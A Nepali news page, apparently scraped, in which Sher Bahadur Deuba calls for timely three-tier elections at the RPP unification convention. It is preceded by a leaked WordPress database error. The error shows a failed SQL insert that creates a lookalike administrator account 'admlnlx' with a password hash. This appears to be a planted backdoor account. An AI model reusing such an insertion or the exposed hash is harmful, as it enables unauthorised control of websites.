WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBdIdbzwxZKBCSEf.Mgm9.knQ3S0wI.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:37:41', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ६–
नेपाली काँग्रेसका सभापति शेरबहादुर देउवाले माघ भित्रै तीन तहको निर्वाचन हुनुपर्ने बताउनुभएको छ । आजदेखि काठमाडौंमा सुरु भएको राप्रपाको एकता महाधिवेशनको उद्घाटन सत्रमा सम्बोधन गर्दै सभापति देउवाले देश अहिले गम्भिर संक्रमणमा रहेको भन्दै तीनै तहको निर्वाचन समयमै हुनुपर्ने बताउनुभयो ।
उहाँले सरकार निर्वाचन गराउने तयारी गरिरहेको भन्दै छिट्टै मिति घोषणा हुनुपर्ने बताउनुभयो । उहाँले राप्रपालाई देशको गौरवपूर्ण पाटीको रुपमा उदाओस् भनेर शुभकामना दिँदै राष्ट्रिय राजनीतिमा राप्रपाको महत्वपूर्ण योगदान रहेको बताउनुभयो ।